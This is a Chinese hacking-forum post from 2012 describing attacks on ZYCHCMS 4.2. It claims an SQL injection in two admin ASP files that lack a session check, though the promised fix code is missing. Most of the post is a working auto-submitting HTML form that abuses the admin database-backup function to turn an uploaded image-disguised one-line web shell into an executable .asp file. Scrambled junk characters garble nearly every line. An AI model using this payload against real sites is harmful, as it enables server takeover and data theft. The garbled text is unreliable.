7 o5 M' c* `, W
$ q: E* g- N8 F% u- D1 H6 t8 B4 x
( D' Z; X1 H9 p0 o" A: ] P0 X% ^' W! N" v7 A7 O
影响版本:ZYCHCMS企业网站管理系统4.2(存在以下两个文件的版本应该是通杀)7 ]9 T. | a- N6 E7 J
①SQL注射漏洞
. P- S9 j. T+ h: n 漏洞文件:/admin/add_js.asp & /admin/add_xm_jiang.asp; S& r6 I# a% A2 C/ S: m6 H
漏洞原因:未过滤8 ?, `8 P$ `! v2 O, g8 Q2 l. u
漏洞代码:
9 B3 }$ i' c# }; v 都是相同的,文件开头没有调用过滤文件/admin/seeion.asp,导致没有对当前权限进行判断,就直接操作数据库。( P6 r) x& y9 a2 F4 t
修复方法:在文件开头加入代码
- ~2 }3 S+ W- x, H
; b' H- _, s; j | Q3 _: M3 t* ~7 A1 |+ I6 C" C
②后台拿WBSHELL& y5 g6 n% m% e0 [2 [5 i0 _# |2 r
进入后台有一个数据库备份,可以通过本地提交突破创建.asp后缀文件夹,并将一句话备份进去。* V* | p. a: M8 B% q( ~
这里在网上找了一个,改了下,将就着用。 r7 P; q/ o- a/ {- N& I; Y# u6 U/ D# D
以下是代码本地提交代码
" h2 J+ O9 z9 |( j2 c, [# {
0 p9 K1 J' {) ^3 g \) A' b0 A/ d. }5 }4 i9 n2 m& h- w( ~
<form method=”post” action=”http://localhost/admin/Manage_backup.asp?action=Backup” name=add>
) g* x) y4 q7 Z7 ^2 y <!–eg:http://127.0.0.1:99/admin/Manage_backup.asp?action=Backup–>3 U1 D2 Q$ Y* H* j/ m
<tr>
) q3 H3 E* w! O& b( B <td height=”30″ background=”images/bg_list.gif”><div style=”padding-left:10px; font-weight:bold; color:#FFFFFF; text-align:left”>备份数据库</div></td>! Y; }+ D9 s5 |. Z* C
</tr>, J! `( Q& v$ J3 q# G# A+ [) s
<tr>
0 q2 x5 v: |# r. A <td bgcolor=”#FFFFFF”><span class=”back_southidc”>
2 v( J% x. ? K6 b </span>- \+ B5 t$ A, M( ~* L
<table width=”100%” border=”0″ align=”center” cellpadding=”5″ cellspacing=”0″ >$ R( W% q+ `4 y6 x
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″ >" m' V, M# Q6 }; g. b+ S' Y
<td height=”25″ width=”30%” class=”td”><div align=”left”>当前数据库路径</div></td>
7 {/ @9 \' x" H# h <td width=”70%” class=”td”>90sec. K5 L9 v8 S8 d4 T: o4 G0 B, d" K
<div align=”left”>
! q" V* ^) H* a8 I6 t5 f, { <input type=”text” size=”30″ name=”DBpath” value=”此处为你在其网站上传的图片格式一句话路径” />
8 N3 X; T) G; J <!–eg:../uploadfile/image/Logo/20120803130885328532_ZYCH.jpg>$ G" r' A3 b; W7 J1 [" H# B& @
<input type=”hidden” size=”50″ name=”bkfolder” value=”123.asp” />/ d, J% A& `: {; T
</div></td>
- F& @# ]' S# O: H- ^. s </tr>
/ l8 f+ @: A/ o/ J8 Y8 n6 K, O <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#FFFFFF’” bgcolor=”#FFFFFF”>
6 u" S" f' m% y <td height=”25″ width=”30%” class=”td”><div align=”left”>备份数据库名称</div></td>
2 u, m9 Q0 h% s Y2 m <td class=”td”><div align=”left”>% o9 j9 o' E% S% ~
<input type=”text” size=”30″ name=”bkDBname” value=”4.mdb” />) b0 s" W( } G# n8 I! z$ R
[如备份目录有该文件,将覆盖,如沒有,将自动创建]</div></td>' S; o! H& o }& P; u% D+ L
</tr>5 ]% S+ o4 c) E r" i
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″>
0 b7 P, B( H% X <td height=”25″ width=”30%” class=”td”><div align=”left”></div></td>
: o5 k: s/ F. V: _. s" [8 E <td class=”td”><div align=”left”>5 I" y# `: G, B
<input type=”submit” value=”确定备份” class=”btn”, ^' M6 M, A& c& C0 v1 z
</div></td>
; ~ J' I8 g+ ^" p/ o* H; b9 B( J* u8 F </tr>
* T: Z2 [8 s w+ [ </table></td></tr></form>1 t; b+ w+ ?' c% R. w5 h
</table>
, T7 r5 j2 u! R </td>, u$ p4 [4 \4 h; m$ ~) K0 e" K
</tr>
L. L" {+ X9 C </table>
' w: g$ g7 ~6 T7 e4 u h <script>
) u3 u' u0 ?1 i8 y! j6 ~" x4 p document.all.add.submit();5 B5 g: t3 o5 {1 u
</script>' x$ d+ [2 }. B. V+ \! `9 u; R
; K3 U0 i" b2 {+ o0 X
+ Z( q1 i6 p5 L8 O i. v& Z2 ^9 h% h4 K. L8 V0 A5 O4 G0 q' i0 z; W
5 r" f R* S R/ X) A9 J2 Z
; B& W2 R+ y- h+ f+ Z/ [4 ]
: X0 m# S/ L4 d4 t1 [
7 C' W# [% w- k
0 {! k d* m) h7 g' }( d! p4 m. i2 K3 D( i$ [
; ~# g, X2 [2 @9 ? |
发表于 2012-9-10 21:09:51
收藏
分享
支持
反对